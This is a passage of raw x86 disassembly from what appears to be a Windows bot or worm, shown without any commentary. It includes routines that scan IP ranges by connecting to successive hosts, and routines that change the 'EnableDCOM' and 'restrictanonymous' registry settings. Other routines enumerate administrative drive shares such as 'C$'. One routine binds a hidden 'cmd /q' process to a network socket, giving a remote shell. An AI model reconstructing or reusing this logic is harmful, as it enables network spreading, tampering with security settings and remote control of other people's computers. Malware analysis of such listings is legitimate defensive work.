; ---------------------------------------------------------------------------
loc_415D26: ; CODE XREF: sub_415CFF+10�j
mov ecx, [esi]
xor eax, eax
cmp ecx, [ebp+arg_4]
setz al
loc_415D30: ; CODE XREF: sub_415CFF+25�j
test eax, eax
jnz short loc_415D42
add esi, 14h
inc edi
cmp esi, offset dword_438C10
jb short loc_415D0B
jmp short loc_415D50
; ---------------------------------------------------------------------------
loc_415D42: ; CODE XREF: sub_415CFF+33�j
push [ebp+arg_0]
lea eax, [edi+edi*4]
call ds:off_438BB0[eax*4]
pop ecx
loc_415D50: ; CODE XREF: sub_415CFF+41�j
cmp [ebp+arg_8], 0
pop edi
pop esi
jz short loc_415D63
push [ebp+arg_0]
call sub_415C5C
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_415D63: ; CODE XREF: sub_415CFF+57�j
mov eax, [ebp+arg_0]
pop ebp
retn
sub_415CFF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415D68 proc near ; DATA XREF: sub_415E35+7B�o
var_B8 = dword ptr -0B8h
var_B4 = byte ptr -0B4h
var_34 = dword ptr -34h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0B8h
mov eax, [ebp+arg_0]
push esi
push edi
push 2Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_B8]
push 1
rep movsd
pop esi
mov [eax+0A4h], esi
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_417330
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+var_34]
call ds:dword_43F668 ; htons
mov [ebp+var_E], ax
mov eax, [ebp+var_28]
push 6
push esi
push 2
mov [ebp+var_C], eax
call ds:dword_43F6E8 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_415E26
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call ds:dword_43F610 ; connect
mov ecx, [ebp+var_2C]
imul ecx, 234h
cmp eax, 0FFFFFFFFh
mov ds:dword_4450CC[ecx], esi
jz short loc_415E26
push [ebp+var_34]
push [ebp+var_28]
call ds:dword_43F6F4 ; inet_ntoa
push eax
mov edi, offset dword_489DE4
push offset unk_438C2C
push edi
call sub_4172AE
push 0
lea eax, [ebp+var_B4]
push [ebp+var_20]
push edi
push eax
push [ebp+var_B8]
call sub_40D679
push edi
call sub_40BF6D
add esp, 28h
loc_415E26: ; CODE XREF: sub_415D68+5D�j
; sub_415D68+7E�j
push esi
call ds:dword_43F700 ; closesocket
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_415D68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_415E35 proc near ; DATA XREF: sub_40EE72+35E0�o
var_130 = byte ptr -130h
var_B0 = byte ptr -0B0h
var_2C = dword ptr -2Ch
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 130h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push 2Ah
mov esi, ebx
pop ecx
lea edi, [ebp+var_B0]
rep movsd
mov esi, ds:dword_424064
mov dword ptr [ebx+0A0h], 1
xor edi, edi
loc_415E63: ; CODE XREF: sub_415E35+EC�j
push [ebp+var_2C]
push [ebp+var_20]
call ds:dword_43F6F4 ; inet_ntoa
push eax
lea eax, [ebp+var_130]
push offset unk_438C64
push eax
call sub_4172AE
lea eax, [ebp+var_130]
push 1FFh
push eax
mov eax, [ebp+var_24]
imul eax, 234h
add eax, offset dword_444EC0
push eax
call sub_418C10
add esp, 1Ch
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_B0]
push edi
push eax
push offset sub_415D68
push edi
push edi
call ds:dword_4240A0 ; CreateThread
cmp eax, edi
mov [ebp+var_4], eax
jz short loc_415ECF
loc_415EC4: ; CODE XREF: sub_415E35+98�j
cmp [ebp+var_C], edi
jnz short loc_415ECF
push 32h
call esi ; Sleep
jmp short loc_415EC4
; ---------------------------------------------------------------------------
loc_415ECF: ; CODE XREF: sub_415E35+8D�j
; sub_415E35+92�j
push [ebp+var_4]
call ds:off_424078
push dword ptr [ebx+88h]
mov [ebx+0A4h], edi
call esi ; Sleep
lea eax, [ebp+var_20]
push 4
push eax
lea eax, [ebp+arg_0]
push eax
call sub_417390
add esp, 0Ch
push [ebp+arg_0]
call ds:dword_43F59C ; htonl
inc eax
push eax
mov [ebp+arg_0], eax
call ds:dword_43F664 ; htonl
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push 4
push eax
lea eax, [ebp+var_20]
push eax
call sub_417390
add esp, 0Ch
jmp loc_415E63
sub_415E35 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415F26 proc near ; DATA XREF: sub_40EE72+5F4D�o
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 98h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
rep movsd
pop edi
pop esi
push [ebp+var_8]
cmp [ebp+var_10], 0
mov dword ptr [eax+94h], 1
lea eax, [ebp+var_94]
push [ebp+var_C]
push eax
push [ebp+var_98]
jz short loc_415F6D
call sub_415F86
jmp short loc_415F72
; ---------------------------------------------------------------------------
loc_415F6D: ; CODE XREF: sub_415F26+3E�j
call sub_4162AA
loc_415F72: ; CODE XREF: sub_415F26+45�j
add esp, 10h
push [ebp+var_14]
call sub_417076
pop ecx
push 0
call ds:dword_424054 ; ExitThread
sub_415F26 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415F86 proc near ; CODE XREF: sub_415F26+40�p
var_214 = byte ptr -214h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 214h
push esi
push edi
xor edi, edi
cmp ds:dword_43F738, edi
jnz loc_4160B8
lea eax, [ebp+var_4]
mov esi, 80000002h
push eax
push 2001Fh
push edi
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
push esi
call ds:dword_43F6D8 ; RegOpenKeyExA
test eax, eax
jnz short loc_416011
mov ax, ds:word_439014
mov word ptr [ebp+var_8+2], ax
lea eax, [ebp+var_8+2]
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_8+2]
push eax
push 1
push edi
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call ds:dword_43F68C ; RegSetValueExA
test eax, eax
jz short loc_415FF3
push offset unk_438FD4
jmp short loc_415FF8
; ---------------------------------------------------------------------------
loc_415FF3: ; CODE XREF: sub_415F86+64�j
push offset dword_438FA8
loc_415FF8: ; CODE XREF: sub_415F86+6B�j
lea eax, [ebp+var_214]
push eax
call sub_4172AE
pop ecx
pop ecx
push [ebp+var_4]
call ds:dword_43F644 ; RegCloseKey
jmp short loc_416024
; ---------------------------------------------------------------------------
loc_416011: ; CODE XREF: sub_415F86+36�j
lea eax, [ebp+var_214]
push offset unk_438F68
push eax
call sub_4172AE
pop ecx
pop ecx
loc_416024: ; CODE XREF: sub_415F86+89�j
cmp [ebp+arg_C], edi
jnz short loc_416043
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 14h
loc_416043: ; CODE XREF: sub_415F86+A1�j
lea eax, [ebp+var_214]
push eax
call sub_40BF6D
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push edi
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call ds:dword_43F6D8 ; RegOpenKeyExA
test eax, eax
jnz short loc_4160B1
lea eax, [ebp+var_8]
push 4
push eax
push 4
push edi
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov [ebp+var_8], 1
call ds:dword_43F68C ; RegSetValueExA
test eax, eax
jz short loc_416093
push offset unk_438F08
jmp short loc_416098
; ---------------------------------------------------------------------------
loc_416093: ; CODE XREF: sub_415F86+104�j
push offset unk_438EC4
loc_416098: ; CODE XREF: sub_415F86+10B�j
lea eax, [ebp+var_214]
push eax
call sub_4172AE
pop ecx
pop ecx
push [ebp+var_4]
call ds:dword_43F644 ; RegCloseKey
jmp short loc_4160CB
; ---------------------------------------------------------------------------
loc_4160B1: ; CODE XREF: sub_415F86+E2�j
push offset unk_438E78
jmp short loc_4160BD
; ---------------------------------------------------------------------------
loc_4160B8: ; CODE XREF: sub_415F86+13�j
push offset unk_438E38
loc_4160BD: ; CODE XREF: sub_415F86+130�j
lea eax, [ebp+var_214]
push eax
call sub_4172AE
pop ecx
pop ecx
loc_4160CB: ; CODE XREF: sub_415F86+129�j
cmp [ebp+arg_C], edi
jnz short loc_4160EA
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 14h
loc_4160EA: ; CODE XREF: sub_415F86+148�j
lea eax, [ebp+var_214]
push eax
call sub_40BF6D
cmp ds:dword_43F760, edi
pop ecx
jnz loc_416265
push ebx
mov [ebp+var_4], edi
mov [ebp+var_14], edi
mov [ebp+var_C], edi
loc_41610D: ; CODE XREF: sub_415F86+2C3�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push 0FFFFFFFFh
push eax
push 1F6h
push edi
call ds:dword_43F5B4
cmp eax, edi
mov [ebp+var_10], eax
jz short loc_4161AA
cmp eax, 0EAh
jz short loc_4161AA
mov esi, offset off_438CA0
loc_41613E: ; CODE XREF: sub_415F86+21D�j
push dword ptr [esi]
push edi
call sub_40DCC3
pop ecx
pop ecx
push dword ptr [esi]
test eax, eax
jnz short loc_416155
push offset unk_438E04
jmp short loc_41615A
; ---------------------------------------------------------------------------
loc_416155: ; CODE XREF: sub_415F86+1C6�j
push offset unk_438DC8
loc_41615A: ; CODE XREF: sub_415F86+1CD�j
lea eax, [ebp+var_214]
push 200h
push eax
call sub_41782A
add esp, 10h
cmp [ebp+arg_C], edi
jnz short loc_41618D
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 14h
loc_41618D: ; CODE XREF: sub_415F86+1EB�j
lea eax, [ebp+var_214]
push eax
call sub_40BF6D
add esi, 8
pop ecx
cmp esi, offset dword_438CC0
jb short loc_41613E
jmp loc_416242
; ---------------------------------------------------------------------------
loc_4161AA: ; CODE XREF: sub_415F86+1AA�j
; sub_415F86+1B1�j
mov esi, [ebp+var_8]
push 1
pop ebx
cmp [ebp+var_4], ebx
jb loc_416239
loc_4161B9: ; CODE XREF: sub_415F86+2AF�j
mov edi, [esi]
push edi
call sub_41999C
cmp word ptr [edi+eax*2-2], 24h
pop ecx
jnz short loc_41622E
push edi
call sub_40DBB0
push eax
push 0
call sub_40DCC3
add esp, 0Ch
push dword ptr [esi]
test eax, eax
jnz short loc_4161E8
push offset unk_438D94
jmp short loc_4161ED
; ---------------------------------------------------------------------------
loc_4161E8: ; CODE XREF: sub_415F86+259�j
push offset unk_438D58
loc_4161ED: ; CODE XREF: sub_415F86+260�j
lea eax, [ebp+var_214]
push 200h
push eax
call sub_41782A
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_416221
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 14h
loc_416221: ; CODE XREF: sub_415F86+27F�j
lea eax, [ebp+var_214]
push eax
call sub_40BF6D
pop ecx
loc_41622E: ; CODE XREF: sub_415F86+242�j
add esi, 28h
inc ebx
cmp ebx, [ebp+var_4]
jbe short loc_4161B9
xor edi, edi
loc_416239: ; CODE XREF: sub_415F86+22D�j
push [ebp+var_8]
call ds:dword_43F6F8
loc_416242: ; CODE XREF: sub_415F86+21F�j
cmp [ebp+var_10], 0EAh
jz loc_41610D
lea eax, [ebp+var_214]
push offset unk_438D20
push eax
call sub_4172AE
pop ecx
pop ecx
pop ebx
jmp short loc_416278
; ---------------------------------------------------------------------------
loc_416265: ; CODE XREF: sub_415F86+177�j
lea eax, [ebp+var_214]
push offset unk_438CE0
push eax
call sub_4172AE
pop ecx
pop ecx
loc_416278: ; CODE XREF: sub_415F86+2DD�j
cmp [ebp+arg_C], edi
jnz short loc_416296
push edi
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 14h
loc_416296: ; CODE XREF: sub_415F86+2F5�j
lea eax, [ebp+var_214]
push eax
call sub_40BF6D
pop ecx
push 1
pop eax
pop edi
pop esi
leave
retn
sub_415F86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4162AA proc near ; CODE XREF: sub_415F26:loc_415F6D�p
var_220 = byte ptr -220h
var_20 = byte ptr -20h
var_14 = byte ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 220h
push ebx
xor ebx, ebx
cmp ds:dword_43F738, ebx
push esi
jnz loc_4163D8
lea eax, [ebp+var_4]
mov esi, 80000002h
push eax
push 2001Fh
push ebx
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
push esi
call ds:dword_43F6D8 ; RegOpenKeyExA
test eax, eax
jnz short loc_416335
mov ax, ds:word_4391FC
mov word ptr [ebp+var_8+2], ax
lea eax, [ebp+var_8+2]
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_8+2]
push eax
push 1
push ebx
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call ds:dword_43F68C ; RegSetValueExA
test eax, eax
jz short loc_416317
push offset unk_4391C8
jmp short loc_41631C
; ---------------------------------------------------------------------------
loc_416317: ; CODE XREF: sub_4162AA+64�j
push offset dword_43919C
loc_41631C: ; CODE XREF: sub_4162AA+6B�j
lea eax, [ebp+var_220]
push eax
call sub_4172AE
pop ecx
pop ecx
push [ebp+var_4]
call ds:dword_43F644 ; RegCloseKey
jmp short loc_416348
; ---------------------------------------------------------------------------
loc_416335: ; CODE XREF: sub_4162AA+36�j
lea eax, [ebp+var_220]
push offset unk_438F68
push eax
call sub_4172AE
pop ecx
pop ecx
loc_416348: ; CODE XREF: sub_4162AA+89�j
cmp [ebp+arg_C], ebx
jnz short loc_416367
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 14h
loc_416367: ; CODE XREF: sub_4162AA+A1�j
lea eax, [ebp+var_220]
push eax
call sub_40BF6D
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push ebx
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call ds:dword_43F6D8 ; RegOpenKeyExA
test eax, eax
jnz short loc_4163D1
lea eax, [ebp+var_8]
push 4
push eax
push 4
push ebx
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov [ebp+var_8], ebx
call ds:dword_43F68C ; RegSetValueExA
test eax, eax
jz short loc_4163B3
push offset unk_439150
jmp short loc_4163B8
; ---------------------------------------------------------------------------
loc_4163B3: ; CODE XREF: sub_4162AA+100�j
push offset unk_43910C
loc_4163B8: ; CODE XREF: sub_4162AA+107�j
lea eax, [ebp+var_220]
push eax
call sub_4172AE
pop ecx
pop ecx
push [ebp+var_4]
call ds:dword_43F644 ; RegCloseKey
jmp short loc_4163EB
; ---------------------------------------------------------------------------
loc_4163D1: ; CODE XREF: sub_4162AA+E2�j
push offset unk_4390C0
jmp short loc_4163DD
; ---------------------------------------------------------------------------
loc_4163D8: ; CODE XREF: sub_4162AA+13�j
push offset unk_438E38
loc_4163DD: ; CODE XREF: sub_4162AA+12C�j
lea eax, [ebp+var_220]
push eax
call sub_4172AE
pop ecx
pop ecx
loc_4163EB: ; CODE XREF: sub_4162AA+125�j
cmp [ebp+arg_C], ebx
jnz short loc_41640A
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 14h
loc_41640A: ; CODE XREF: sub_4162AA+144�j
lea eax, [ebp+var_220]
push eax
call sub_40BF6D
cmp ds:dword_43F760, ebx
pop ecx
jnz loc_41657F
push edi
mov esi, offset off_438CA0
mov edi, 200h
loc_41642E: ; CODE XREF: sub_4162AA+1E9�j
push dword ptr [esi+4]
push dword ptr [esi]
push ebx
call sub_40DC17
add esp, 0Ch
push dword ptr [esi]
test eax, eax
jnz short loc_416449
push offset unk_439090
jmp short loc_41644E
; ---------------------------------------------------------------------------
loc_416449: ; CODE XREF: sub_4162AA+196�j
push offset unk_439058
loc_41644E: ; CODE XREF: sub_4162AA+19D�j
lea eax, [ebp+var_220]
push edi
push eax
call sub_41782A
add esp, 10h
cmp [ebp+arg_C], ebx
jnz short loc_41647D
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 14h
loc_41647D: ; CODE XREF: sub_4162AA+1B7�j
lea eax, [ebp+var_220]
push eax
call sub_40BF6D
add esi, 8
pop ecx
cmp esi, offset off_438CB0
jb short loc_41642E
call ds:dword_42417C ; GetLogicalDrives
test eax, eax
mov [ebp+var_4], eax
mov bl, 41h
jz loc_416567
loc_4164A8: ; CODE XREF: sub_4162AA+2B7�j
mov eax, [ebp+var_4]
and eax, 1
cmp al, 1
jnz loc_41655C
cmp bl, 41h
jz loc_41655C
movsx esi, bl
push esi
push offset aC_3 ; "%c$"
lea eax, [ebp+var_14]
push 0Ah
push eax
call sub_41782A
add esp, 10h
lea eax, [ebp+var_20]
push esi
push offset aC_2 ; "%c:\\"
push 0Ah
push eax
call sub_41782A
add esp, 10h
lea eax, [ebp+var_20]
push eax
call ds:dword_43F6C8 ; GetDriveTypeA
cmp eax, 3
jnz short loc_41655C
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14]
push eax
push 0
call sub_40DC17
add esp, 0Ch
test eax, eax
lea eax, [ebp+var_14]
push eax
jnz short loc_41651A
push offset unk_439090
jmp short loc_41651F
; ---------------------------------------------------------------------------
loc_41651A: ; CODE XREF: sub_4162AA+267�j
push offset unk_439058
loc_41651F: ; CODE XREF: sub_4162AA+26E�j
lea eax, [ebp+var_220]
push edi
push eax
call sub_41782A
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_41654F
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 14h
loc_41654F: ; CODE XREF: sub_4162AA+289�j
lea eax, [ebp+var_220]
push eax
call sub_40BF6D
pop ecx
loc_41655C: ; CODE XREF: sub_4162AA+206�j
; sub_4162AA+20F�j ...
inc bl
shr [ebp+var_4], 1
jnz loc_4164A8
loc_416567: ; CODE XREF: sub_4162AA+1F8�j
lea eax, [ebp+var_220]
push offset unk_439018
push eax
call sub_4172AE
pop ecx
xor ebx, ebx
pop ecx
pop edi
jmp short loc_416592
; ---------------------------------------------------------------------------
loc_41657F: ; CODE XREF: sub_4162AA+173�j
lea eax, [ebp+var_220]
push offset unk_438CE0
push eax
call sub_4172AE
pop ecx
pop ecx
loc_416592: ; CODE XREF: sub_4162AA+2D3�j
cmp [ebp+arg_C], ebx
jnz short loc_4165B0
push ebx
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 14h
loc_4165B0: ; CODE XREF: sub_4162AA+2EB�j
lea eax, [ebp+var_220]
push eax
call sub_40BF6D
pop ecx
push 1
pop eax
pop esi
pop ebx
leave
retn
sub_4162AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4165C4 proc near ; CODE XREF: sub_41547E+1AF�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push edi
call sub_416715
imul edi, 234h
mov esi, eax
xor ebx, ebx
mov eax, ds:dword_4450CC[edi]
mov [ebp+var_C], 0Ch
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [esi+0Ch], eax
mov edi, ds:dword_4240A0
pop ecx
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_4168E7
lea eax, [ebp+var_C]
push ebx
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+10h], eax
jnz short loc_41662F
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset dword_439244
call sub_40BFE1
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
pop ecx
jmp short loc_416669
; ---------------------------------------------------------------------------
loc_41662F: ; CODE XREF: sub_4165C4+50�j
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_416999
lea eax, [ebp+var_C]
push ebx
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+14h], eax
jnz short loc_416670
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset dword_439244
call sub_40BFE1
pop ecx
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
push ebx
push dword ptr [esi+14h]
call ds:dword_424168 ; TerminateThread
loc_416669: ; CODE XREF: sub_4165C4+69�j
xor eax, eax
jmp loc_416710
; ---------------------------------------------------------------------------
loc_416670: ; CODE XREF: sub_4165C4+82�j
mov eax, [esi+10h]
push 0FFFFFFFFh
mov [ebp+var_18], eax
mov eax, [esi+14h]
mov [ebp+var_14], eax
mov eax, [esi+8]
mov [ebp+var_10], eax
lea eax, [ebp+var_18]
push ebx
push eax
push 3
call ds:dword_424180 ; WaitForMultipleObjects
sub eax, ebx
jz short loc_4166CA
dec eax
jz short loc_4166C4
dec eax
jz short loc_4166B0
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset dword_439200
call sub_40BFE1
pop ecx
pop ecx
jmp short loc_4166DF
; ---------------------------------------------------------------------------
loc_4166B0: ; CODE XREF: sub_4165C4+D5�j
mov edi, ds:dword_424168
push ebx
push dword ptr [esi+14h]
call edi ; TerminateThread
push ebx
push dword ptr [esi+10h]
call edi ; TerminateThread
jmp short loc_4166DF
; ---------------------------------------------------------------------------
loc_4166C4: ; CODE XREF: sub_4165C4+D2�j
push ebx
push dword ptr [esi+10h]
jmp short loc_4166CE
; ---------------------------------------------------------------------------
loc_4166CA: ; CODE XREF: sub_4165C4+CF�j
push ebx
push dword ptr [esi+14h]
loc_4166CE: ; CODE XREF: sub_4165C4+104�j
call ds:dword_424168 ; TerminateThread
push 1
push dword ptr [esi+8]
call ds:dword_424170 ; TerminateProcess
loc_4166DF: ; CODE XREF: sub_4165C4+EA�j
; sub_4165C4+FE�j
push dword ptr [esi+10h]
mov edi, ds:off_424078
call edi ; sub_49C3D5
push dword ptr [esi+14h]
call edi ; sub_49C3D5
push dword ptr [esi+8]
call edi ; sub_49C3D5
push dword ptr [esi]
call edi ; sub_49C3D5
push dword ptr [esi+4]
call edi ; sub_49C3D5
push dword ptr [esi+0Ch]
call ds:dword_43F700 ; closesocket
push esi
call sub_417C3B
pop ecx
push 1
pop eax
loc_416710: ; CODE XREF: sub_4165C4+A7�j
pop edi
pop esi
pop ebx
leave
retn
sub_4165C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416715 proc near ; CODE XREF: sub_4165C4+D�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
xor edi, edi
push 18h
mov [ebp+var_4], edi
mov [ebp+var_8], edi
call sub_417B89
mov esi, eax
pop ecx
cmp esi, edi
jz loc_4167FF
mov ebx, ds:dword_424140
lea eax, [ebp+var_14]
push edi
push eax
lea eax, [ebp+var_8]
mov [esi], edi
push eax
mov [esi+4], edi
push esi
mov [ebp+var_14], 0Ch
mov [ebp+var_10], edi
mov [ebp+var_C], 1
call ebx ; CreatePipe
mov edi, ds:off_424078
test eax, eax
jnz short loc_416778
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset dword_439324
jmp short loc_416798
; ---------------------------------------------------------------------------
loc_416778: ; CODE XREF: sub_416715+53�j
lea eax, [ebp+var_14]
push 0
push eax
lea eax, [esi+4]
push eax
lea eax, [ebp+var_4]
push eax
call ebx ; CreatePipe
test eax, eax
jnz short loc_4167A0
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset dword_4392D4
loc_416798: ; CODE XREF: sub_416715+61�j
call sub_40BFE1
pop ecx
jmp short loc_4167CE
; ---------------------------------------------------------------------------
loc_4167A0: ; CODE XREF: sub_416715+75�j
push [ebp+arg_0]
push [ebp+var_8]
push [ebp+var_4]
call sub_41680E
add esp, 0Ch
mov [esi+8], eax
push [ebp+var_4]
call edi ; sub_49C3D5
push [ebp+var_8]
call edi ; sub_49C3D5
cmp dword ptr [esi+8], 0
jnz short loc_416803
push offset dword_43929C
call sub_40BF6D
loc_4167CE: ; CODE XREF: sub_416715+89�j
cmp [ebp+var_4], 0
pop ecx
jz short loc_4167DA
push [ebp+var_4]
call edi ; sub_49C3D5
loc_4167DA: ; CODE XREF: sub_416715+BE�j
cmp [ebp+var_8], 0
jz short loc_4167E5
push [ebp+var_8]
call edi ; sub_49C3D5
loc_4167E5: ; CODE XREF: sub_416715+C9�j
mov eax, [esi]
test eax, eax
jz short loc_4167EE
push eax
call edi ; sub_49C3D5
loc_4167EE: ; CODE XREF: sub_416715+D4�j
mov eax, [esi+4]
test eax, eax
jz short loc_4167F8
push eax
call edi ; sub_49C3D5
loc_4167F8: ; CODE XREF: sub_416715+DE�j
push esi
call sub_417C3B
pop ecx
loc_4167FF: ; CODE XREF: sub_416715+1D�j
xor eax, eax
jmp short loc_416809
; ---------------------------------------------------------------------------
loc_416803: ; CODE XREF: sub_416715+AD�j
or dword ptr [esi+0Ch], 0FFFFFFFFh
mov eax, esi
loc_416809: ; CODE XREF: sub_416715+EC�j
pop edi
pop esi
pop ebx
leave
retn
sub_416715 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41680E proc near ; CODE XREF: sub_416715+94�p
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 58h
push ebx
push esi
push edi
push 44h
pop edi
xor esi, esi
push edi
lea eax, [ebp+var_58]
push esi
push eax
mov [ebp+var_4], esi
call sub_417330
push 10h
lea eax, [ebp+var_14]
push esi
push eax
call sub_417330
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
add esp, 18h
mov [ebp+var_20], eax
lea eax, [ebp+var_18]
mov [ebp+var_58], edi
mov edi, ds:dword_42413C
push esi
push 1
push 2
push eax
mov [ebp+var_54], esi
mov [ebp+var_4C], esi
mov [ebp+var_50], esi
mov [ebp+var_3C], esi
mov [ebp+var_40], esi
mov [ebp+var_44], esi
mov [ebp+var_48], esi
mov [ebp+var_28], si
mov [ebp+var_24], esi
mov [ebp+var_26], si
mov [ebp+var_2C], 101h
mov [ebp+var_1C], ebx
call edi ; GetCurrentProcess
push eax
push ebx
call edi ; GetCurrentProcess
push eax
call ds:dword_424138 ; DuplicateHandle
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
push esi
push esi
push esi
push 1
push esi
push esi
push offset aCmdQ ; "cmd /q"
push esi
call ds:dword_424120 ; CreateProcessA
test eax, eax
jz short loc_4168CA
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_C]
imul eax, 234h
push [ebp+var_10]
mov esi, [ebp+var_14]
mov ds:dword_4450C8[eax], ecx
call ds:off_424078
jmp short loc_4168E0
; ---------------------------------------------------------------------------
loc_4168CA: ; CODE XREF: sub_41680E+9A�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
push offset dword_439374
call sub_40BFE1
mov esi, [ebp+var_4]
pop ecx
pop ecx
loc_4168E0: ; CODE XREF: sub_41680E+BA�j
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_41680E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4168E7 proc near ; DATA XREF: sub_4165C4+3F�o
var_1B0 = byte ptr -1B0h
